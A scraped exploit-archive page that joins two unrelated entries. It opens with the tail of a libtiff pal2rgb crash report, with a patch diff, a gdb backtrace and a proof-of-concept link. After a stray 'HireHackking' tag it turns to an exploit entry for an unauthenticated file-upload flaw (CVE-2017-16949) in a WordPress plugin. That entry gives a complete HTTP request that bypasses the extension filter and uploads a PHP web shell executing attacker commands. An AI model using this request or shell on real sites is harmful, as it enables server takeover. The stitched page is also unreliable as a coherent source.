the TIFF document. The offset of the corresponding values in the poc.tiff file
is shown below.

COLORMAP {
    R : 0x25~0x224
    G : 0x225~0x424
    B : 0x425~0x624
}

Image Width : 0x24FE
Image Length : 0x250A
------- Comment #4 From ncopa@alpinelinux.org 2017-12-07 04:42:35 -------
The following change fixes the describe behavior:

diff --git a/tools/pal2rgb.c b/tools/pal2rgb.c
index 7a57800..92d9e29 100644
--- a/tools/pal2rgb.c
+++ b/tools/pal2rgb.c
@@ -184,15 +184,17 @@ main(int argc, char* argv[])
     { unsigned char *ibuf, *obuf;
       register unsigned char* pp;
       register uint32 x;
-      ibuf = (unsigned char*)_TIFFmalloc(TIFFScanlineSize(in));
-      obuf = (unsigned char*)_TIFFmalloc(TIFFScanlineSize(out));
+      size_t ibuf_size = TIFFScanlineSize(in);
+      size_t obuf_size = TIFFScanlineSize(out);
+      ibuf = (unsigned char*)_TIFFmalloc(ibuf_size);
+      obuf = (unsigned char*)_TIFFmalloc(obuf_size);
       switch (config) {
       case PLANARCONFIG_CONTIG:
         for (row = 0; row < imagelength; row++) {
             if (!TIFFReadScanline(in, ibuf, row, 0))
                 goto done;
             pp = obuf;
-            for (x = 0; x < imagewidth; x++) {
+            for (x = 0; x < imagewidth && x < (obuf_size-3); x++) {
                 *pp++ = (unsigned char) rmap[ibuf[x]];
                 *pp++ = (unsigned char) gmap[ibuf[x]];
                 *pp++ = (unsigned char) bmap[ibuf[x]];
@@ -205,15 +207,15 @@ main(int argc, char* argv[])
         for (row = 0; row < imagelength; row++) {
             if (!TIFFReadScanline(in, ibuf, row, 0))
                 goto done;
-            for (pp = obuf, x = 0; x < imagewidth; x++)
+            for (pp = obuf, x = 0; x < imagewidth && x < obuf_size; x++)
                 *pp++ = (unsigned char) rmap[ibuf[x]];
             if (!TIFFWriteScanline(out, obuf, row, 0))
                 goto done;
-            for (pp = obuf, x = 0; x < imagewidth; x++)
+            for (pp = obuf, x = 0; x < imagewidth && x < obuf_size; x++)
                 *pp++ = (unsigned char) gmap[ibuf[x]];
             if (!TIFFWriteScanline(out, obuf, row, 0))
                 goto done;
-            for (pp = obuf, x = 0; x < imagewidth; x++)
+            for (pp = obuf, x = 0; x < imagewidth && x < obuf_size; x++)
                 *pp++ = (unsigned char) bmap[ibuf[x]];
             if (!TIFFWriteScanline(out, obuf, row, 0))
                 goto done;


But the pal2rgb stil segfaults. new backtrace:

Core was generated by `pal2rgb /home/ncopa/Downloads/poc.tiff out.tiff'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x000065eb6f74f534 in jpeg_abort () from /usr/lib/libjpeg.so.8
(gdb) bt
#0  0x000065eb6f74f534 in jpeg_abort () from /usr/lib/libjpeg.so.8
#1  0x000065eb6f9c26b7 in TIFFjpeg_abort (sp=sp@entry=0xdbd8738e7c0)
    at tif_jpeg.c:416
#2  0x000065eb6f9c3f8c in JPEGPreDecode (tif=0x65eb6fc06900, s=<optimized out>)
    at tif_jpeg.c:1114
#3  0x000065eb6f9d4305 in TIFFSeek (sample=0, row=54, tif=0x65eb6fc06900)
    at tif_read.c:379
#4  TIFFReadScanline (tif=0x65eb6fc06900, buf=0xdbd8738ef40, row=54, 
    sample=<optimized out>) at tif_read.c:446
#5  0x00000dbd8718c5fc in main (argc=<optimized out>, argv=<optimized out>)
    at pal2rgb.c:194


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43322.zip
HireHackking 
# Exploit Title: Unauthenticated Arbitrary File Upload
# Date: November 12, 2017
# Exploit Author: Colette Chamberland 
# Author contact: colette@defiant.com
# Author homepage: https://defiant.com
# Vendor Homepage: https://accesspressthemes.com/
# Software Link: https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446
# Version:  < 3.2.0
# Tested on: Wordpress 4.x
# CVE : CVE-2017-16949


Description:
Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows
the attacker to upload anything they want, bypassing the filters.
 
PoC:

POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1
Host:server
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792
Content-Length: 264
Referer: http://target.com/
Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6; 
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------7230359611602921801124357792
Content-Disposition: form-data; name="qqfile"; filename="myshell.php"
Content-Type: text/php

<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

-----------------------------7230359611602921801124357792--